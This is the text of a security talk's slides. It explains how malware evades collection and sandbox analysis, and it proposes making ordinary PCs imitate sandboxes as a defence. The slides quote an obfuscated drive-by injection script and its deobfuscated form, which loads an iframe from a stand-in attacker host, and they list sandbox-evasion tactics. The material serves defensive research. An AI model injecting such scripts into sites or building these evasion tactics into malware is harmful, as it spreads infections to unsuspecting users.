2. Introduction
Chief Software Architect for Junos Web App Secure
“Junos Web App Secure is a security deception technology
designed to lace web applications with honeypots on-the-fly”
More recently, leading efforts in malware research.
Can’t share exactly why,
but I can share some interesting ideas that have surfaced as a result.
4. Background
•
Malware Analysis Background
Malware Collection Techniques
o Malware Analysis Techniques
o Signature Development
o
•
Malware Authoring ROI
o
o
•
o
Malware ROI
Optimizing for Success
Hypothetical Example
Evasion
o
o
Distribution Evasion
Sandbox Evasion
5. Background / Malware Collection
How do analysts get malware samples?
•
•
•
•
•
•
Web Crawlers
Torrents
Usenet
Malware Repositories
Email
Droppers
7. Background / Signatures
How do malware signatures get created?
1. Get a sample
2. Analyze it for unique behaviors
- Generate heuristic behavior signature
3. Analyze it for unique data patterns Generate file data signature
4. Distribute new signatures to customers
5. Remove old unnecessary signatures
8. Background / Malware ROI
Uninterrupted Lifecycle:
Research
Development
Testing
Distribution
Grow Infection Base
The infection base grows indefinitely. The more machines infected, the
more return the attacker gets for their initial investment.
In other words… Time = Money
9. Background / Malware ROI
Interrupted Lifecycle:
Research
Development
Testing
Distribution
Grow Infection Base
Signature Published
Sample Detected
Sample Collected
The infection base grows until a signature is published. It then rapidly
declines in growth rate and eventually becomes negligible. The more
machines infected, the more return the attacker gets for their initial
investment.
So… Time to DETECTION = Money
10. Background / Optimizing For
Success
Hypothetical Example:
Bob spends 20 hours researching his target environment. Another 20 hours
writing some ransomware and testing it. Finally, Bob pays someone to distribute
his malware for 50 cents per infection, with a distribution rate of 200 clients per
hour.
Bob’s ransom is $300 and 10% of his victims will chose to pay.
So for every hour Bob’s malware is undetected, he makes:
((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour
Assume the infection rate remains constant for 72 hours, and minus Bob’s time at
(~$50 an hour), Bob makes a total of $422,800.
11. Background / Optimizing For
Success
Hypothetical Example:
Now assume his malware is detected and a signature is published, dropping the
successful ransom collection rate to 1 client per hour.
(hours_before_detection * ((200 clients * .1) * $300) - (200 clients * $0.50)))
+ (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50))
Detection at 6 hours: Bob makes $52,870
Detection at 12 hours: Bob makes $88,500
Detection at 18 hours: Bob makes $120,130
Detection at 24 hours: Bob makes $153,760
So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770.
Thats a lot of motivation!
12. Background / Distribution Evasion
•
•
You can’t analyze something you can’t get.
You can’t generate signatures if you can’t analyze
So if you can avoid serving malware to analysis labs, you
can avoid detection and signature distribution.
Distribution Evasion
Distribute malware only to a select set of targets, narrow
enough to exclude analysis labs.
13. Background / Distribution Evasion
Distribution Evasion Tactics:
•
•
•
•
•
•
•
•
Don’t serve to search engines (Google, Yahoo, Bing, etc…)
Don’t serve to known security lab IPs (Symantec, McAfee, etc…)
Don’t serve to an environment you can’t infect (Missing Plugins,
Unsupported OS, etc…)
Randomly choose not to serve
Serve only to specific countries/IP ranges
Serve only to known browsers
Serve only if referer is whitelisted
Serve only once per IP
14. Background / Distribution Evasion
Distribution Evasion Implementation:
1. Inject obfuscated drive-by download hook into compromised sites:
<script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!''.replace(/^/,String)){while(c-){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return
d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]) {p=p.replace(new
RegExp('b'+e(c)+'b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3
e="1" d="1"c=""+2+""></3>");</0>',17,17,
'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|wi
dth|com|write'.split('|'),0,{}))</script>
Deobfuscated, it looks like this:
<script type="text/javascript">
var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034";
document.write("<iframe width="1" height="1" src="" + ste +
""></iframe>");
</script>
But this does nothing to stop automated crawlers in a research lab.
15. Background / Distribution Evasion
Distribution Evasion Implementation:
2. Add client-side specificity:The malware requires a specific version of
flash to exploit a client, so the drive-by code can actually hide itself unless
you have that version of flash.
<script type="text/javascript">
… encryption/decryption code …
eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b471
8585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c404258445119
1b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b171
41e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave
Flash'].version));
</script>
Now if the lab isn’t using flash version 12.0.0.44, the drive-by iframe will not
16. Background / Distribution Evasion
Distribution Evasion Implementation:
3. Add server-side specificity and filtering:The iframe points to a server
whose sole purpose is to exploit browsers and serve malware. In addition
to picking the right exploit for the target client, it will also not serve malware
if specific conditions are not met.
•
•
•
•
•
You’re not a search engine
Your IP is not blacklisted, or is in a whitelist
You’re using an exploitable OS and browser
This is the first time you have loaded the iframe
Drive by code has been injected into the domain of your referer
Since the research lab doesn't know what conditions the distribution server
requires, it is exceptionally difficult to trick it into serving the malware.
17. Background / Sandbox Evasion
Sandbox Evasion Tactics:
If any of the following are true, do not execute the malware payload:
•
•
•
•
•
•
•
Significant Clock Skew
Debugger is attached
Virtual Machine Detected
No Internet Connection
Unexploitable environment
Sandbox Software Detected
Sleep statements abort prematurely
Sandboxes can only run for a fixed period of time per sample (usually 30-60
seconds), so the malware may try to run longer:
•
•
Long sleep before payload execution
Schedule payload execution for some time in the future
18. Background / Sandbox Evasion
Sandbox evasion techniques can be grouped
into several high level categories:
•
•
•
•
•
Specificity
Triggers
Detection
Interruption
Dialogs
Any given malware sample may do zero or more of these.
19. Background / Sandbox Evasion
Specificity:
•
•
•
•
•
•
•
Has internet connection
Has correct software versions
Has correct OS
Has expected security policies
Public IP is in correct geographical region
Clock skew is minimal
Account data is present (Gmail, AIM, Facebook, etc…)
20. Background / Sandbox Evasion
Specificity:
Requires Email Handing app like Outlook or ThunderBird.
framework
Requires Internet Connection
Requires .NET
Requires Win 95/98
21. Background / Sandbox Evasion
Triggers:
•
•
•
•
Sleep for several minutes
Require multiple executions
Wait for one or more reboots
Wait for event
o User opens .txt file
o User launches browser
o User switches to battery power
o User updates windows
o User installs software
o User connects to WiFi
o HID activity (Mouse, Keyboard, Webcam, Mic)
22. Background / Sandbox Evasion
Triggers:
Requires browser restart to
trigger payload.
Require a second
execution.
23. Background / Sandbox Evasion
Detection:
•
•
•
Debugger Hooks
Virtual Machines
o Registry Keys, Serial Numbers, MAC addresses
o Processes, Services, Drivers, Open Ports
o VM Specific ASM instructions
Sandbox Software
o Open Ports, Processes, Files
24. Background / Sandbox Evasion
Detection:
Themida:
Legitimate Software Piracy
Protection wrapper designed
to detect VM’s and
debuggers. Go figure,
malware authors use it too.
Debugger detection. And
hey, they even explained
how to turn off SoftIce (just in
case you didn’t know how).
No
Printer?
25. Background / Sandbox Evasion
Interruption:
•
•
Analysis Framework Interruption:
o Force Reboot or Logout
o Enable Firewall / Whitelist C&C servers
Screen Capture Interruption
o Open dialogs minimized
o Open other apps Maximized
o Flashing components / Animation
o Hidden MouseOver components
26. Background / Sandbox Evasion
Interruption:
Force a reboot.
Screen Shot Evasion:
The “Play” button
flashes. We got lucky
and took the
screenshot at the right
time.
28. Background / Sandbox Evasion
Simple Dialogs:
What are they?
•
Fake Apps
o Fake Installers
o Fake Errors
o
•
Why?
o
o
o
Prevent sandbox analysis
Phish for information
Legitimize
it looks real, so its probably safe
red flags (UAC, firewall notices, etc…)
29. Background / Sandbox Evasion
Simple Dialogs:
Legitimize UAC dialogs
Require basic human input (click a button)
31. Background / Sandbox Evasion
Advanced Dialogs:
Requires password. Presumably
available with the download link.
Captcha style dialog
Fake dialog. This dialog looks similar
to the default theme of XP, but is
clearly not.
32. Deceptive Inoculation
Bottom line, malware takes great care not to
run in a sandbox environment.
Lets all be sandboxes!
(or at least pretend to be)
33. Deceptive Inoculation
•
Distribution Deception
o
•
Prevent your personal computer from being sent
malware in the first place (stop drive-by-downloads).
Sandbox Deception
o
Prevent malware from executing a payload when
launched on your personal computer.
34. Inoculation / Distribution Evasion
Pretend you’re google bot:
1. Firefox: Install User-Agent-Switcher
2. Set User-Agent to: Googlebot-Image (Googlebot)
Pretend none of your plugins are enabled:
1. Firefox: Go to Tools > Add Ons
2. For everything in the list, select “Ask To Activate”
(Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...)
Disable Referers:
1. Firefox: Go to about:config
2. Set “network.http.sendRefererHeader” to 0
35. Inoculation / Distribution Evasion
Request Suspicious Content Twice:
This doesn’t exist yet, but what if….
iframe: badsite.com
I
F
R
A
M
E
embedded flash
repeat: badsite.com
IFRAME
V
A
L
I
D
A
T
O
R
Bad
Server
no embedded flash
iframe: goodsite.com
no embedded flash
Good
Server
36. Inoculation / Sandbox Evasion
Permanent Debugger
1. Install a debugger
2. Hook every process automatically
Spoof VMWare Artifacts:
1. Create stub exe called “VBoxService.exe” and leave it running on boot.
Skew your clock
1. Change system time to be 1 year behind
2. Disable clock syncing
37. Inoculation / Sandbox Evasion
Sandbox Emulation
1. Open ports (cuckoo: 2042, mongodb: 27017)
2. Configure as Cuckoo Guest:
http://docs.cuckoosandbox.org/en/latest/installation/guest/
But make sure to
cripple the agent!
These changes may result in instability to the system, and would require
some additional testing in a well used desktop environment.
1. Add a dll named “dbghelp.dll” to registry so it loads into every process
2. Temporarily Assign windows product ID of “76487-337-8429955-22614”
(Assign on boot, revert on shutdown)
Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The
38. Conclusion
Practicality:
As it stands, these techniques require some complex
administrative/programming tasks, and would need to be
updated regularly.
Ideally these types of techniques could be packaged into
software that automatically updates and manages
settings for you.
39. Conclusion
Perceived Efficacy:
With just these 5 strategies, we were able to prevent 20%
of malware activity in the samples we analyzed.
True Efficacy:
Hard to say how effective it really is, because the samples
this works on, are less likely to be identified as known
malware.
Fortunately, this means it will reduce malware infection for samples your AV
is unlikely to detect with signatures.
40. More Information
Contact Info:
Email: kadams@juniper.net
Twitter: kadams_sec
LinkedIn:
https://www.linkedin.com/in/adamsk
Presentation Material:
http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow
References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-awaremalware.html